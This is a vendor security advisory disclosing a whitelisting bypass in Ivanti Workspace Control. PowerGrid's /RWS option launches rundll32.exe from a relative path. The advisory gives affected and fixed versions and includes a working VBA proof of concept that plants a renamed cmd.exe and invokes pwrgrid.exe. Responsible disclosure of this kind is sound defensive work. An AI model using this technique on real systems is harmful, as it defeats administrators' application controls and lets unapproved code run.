Advisory

Yorick Koster, August 2018

Ivanti Workspace Control Application Whitelist bypass via PowerGrid /RWS command line argument

Abstract

It was found that the PowerGrid application will execute rundll32.exe from a relative path when it is started with the /RWS command line option. An attacker can abuse this issue to bypass Application Whitelisting in order to run arbitrary code on the target machine.

See also

DOC-68846 - Local Authenticated user could bypass application whitelisting restrictions

Tested versions

This issue was successfully verified on Ivanti Workspace Control version 10.2.700.1.

Fix

This issue was resolved in Ivanti Workspace Control version 10.2.950.0. PowerGrid now uses the GetSystemDirectory() function to construct an absolute path to rundll32.exe.

Introduction

Ivanti Workspace Control (formerly known as RES ONE Workspace) is a User Environment Management solution. It contains a number of security features, one of which being Application Whitelisting. Application Whitelisting can be used to only allow approved applications to execute. Whitelisting can be configured in various ways; in Workspace Control a common used method is to whitelist based on path. As of Workspace Control version 10.1 it also is possible to whitelist based on signing certificate.

By design a number of Workspace Control executables are exempted from Application Whitelisting. One of these applications is the PowerGrid application (pwrgrid.exe). It was found that PowerGrid calls rundll32.exe from a relative path. Because of this it is possible to hijack this call in order to run any executable, effectively bypassing Application Whitelisting.

Details

In order to cause PowerGrid to execute rundll32.exe from a relative path, it should be invoked with the /RWS command line option. In addition, a path to an existing XML file must be provided. If the XML file exists and contains valid XML, PowerGrid will execute rundll32.exe. The affected (decompiled) code is shown below.

/advisory/SFY20180801/rundll32-run-with-relative-path.png
Figure 1: rundll32.exe is executed from a relative path

An attacker can abuse this issue to bypass Application Whitelisting. This can be done by copying a malicious executable onto the target system, naming it rundll32.exe. Next the current working directory should be set to the folder containing the malicious rundll32.exe file and PowerGrid must be invoked with the /RWS command line option and a valid XML file (the file will be deleted afterwards).

When PowerGrid tries to execute rundll32.exe the current working directory is searched before the system directory. When rundll32.exe is found in the current working directory, Windows will execute this application instead of the intended rundll32.exe located in the system directory. Since PowerGrid is not affected by the Application Whitelisting rules the malicious rundll32.exe regardless of what has been configured for the current Workspace.

/advisory/SFY20180801/rundll32-hijack.png
Figure 2: PowerGrid allows hijacking of rundll32.exe

Proof of concept

The VBA code below demonstrates this issue. The code tries to run cmd.exe from the %TEMP% folder.

Private Sub PowerGridAWLBypass()
   On Error Resume Next
   Dim tmpPath, resPath, targetPath
   tmpPath = Environ("TEMP")
   resPath = Environ("RESPFDIR")
   targetPath = Environ("SystemRoot") & "\System32\cmd.exe"
   
   FileCopy targetPath, tmpPath & "\rundll32.exe"
   ChDir tmpPath
   Dim fso As Object
   Set fso = CreateObject("Scripting.FileSystemObject")
   Dim oFile As Object
   Set oFile = fso.CreateTextFile(tmpPath & "\foo.xml")
   oFile.WriteLine "<foo></foo>"
   oFile.Close
   Set fso = Nothing
   Set oFile = Nothing
   Shell resPath & "\pwrgrid.exe /RWS foo.xml", vbNormalFocus
End Sub

Work with us →